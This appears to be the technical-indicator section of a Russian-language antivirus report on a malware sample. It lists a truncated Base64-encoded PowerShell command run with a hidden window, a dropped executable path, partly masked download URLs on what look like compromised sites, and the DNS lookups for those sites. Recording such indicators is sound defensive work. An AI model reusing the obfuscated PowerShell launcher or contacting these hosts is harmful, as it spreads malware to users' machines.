Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAGkAMAA0AGkAcABlAD0AWwBjAGgAYQByAF0ANAAyADsAJABJADIANABlAG0AMgBrAD0AKAAoACcARQAwACcAKwAnAHkAJwApACsAKAAnAHQAdwAnACsAJwAxACcAKQArACcAMQAnACkAOwAuACgAJwBuAGUAdwAtAGkAJw...
- %HOMEPATH%\ieu5y5x\up_266o\nwiba7xx.exe
- %HOMEPATH%\ieu5y5x\up_266o\nwiba7xx.exe
- %HOMEPATH%\ieu5y5x\up_266o\nwiba7xx.exe
- http://th####etalks.com/wp-content/7A/
- http://ex######uvarnasamudra.com/wp-admin/D/
- http://www.ex######uvarnasamudra.com/wp-admin/D/
- http://te#####lamalinche.com/css/p/
- http://te#####lamalinche.com/politica-de-cookies/
- http://ma####areliquia.com/wp-includes/K/
- http://sf####tographer.com/battlemetrics-rust/uw/
- http://ne##.#ngheni.org/wp-includes/e/
- DNS ASK th####etalks.com
- DNS ASK ex######uvarnasamudra.com
- DNS ASK ca####tendero.com
- DNS ASK te#####lamalinche.com
- DNS ASK ma####areliquia.com
- DNS ASK sf####tographer.com
- DNS ASK ne##.#ngheni.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAGkAMAA0AGkAcABlAD0AWwBjAGgAYQByAF0ANAAyADsAJABJADIANABlAG0AMgBrAD0AKAAoACcARQAwACcAKwAnAHkAJwApACsAKAAnAHQAdwAnACsAJwAxACcAKQArACcAMQAnACkAOwAuACgAJwBuAGUAdwAtAGkAJw...' (со скрытым окном)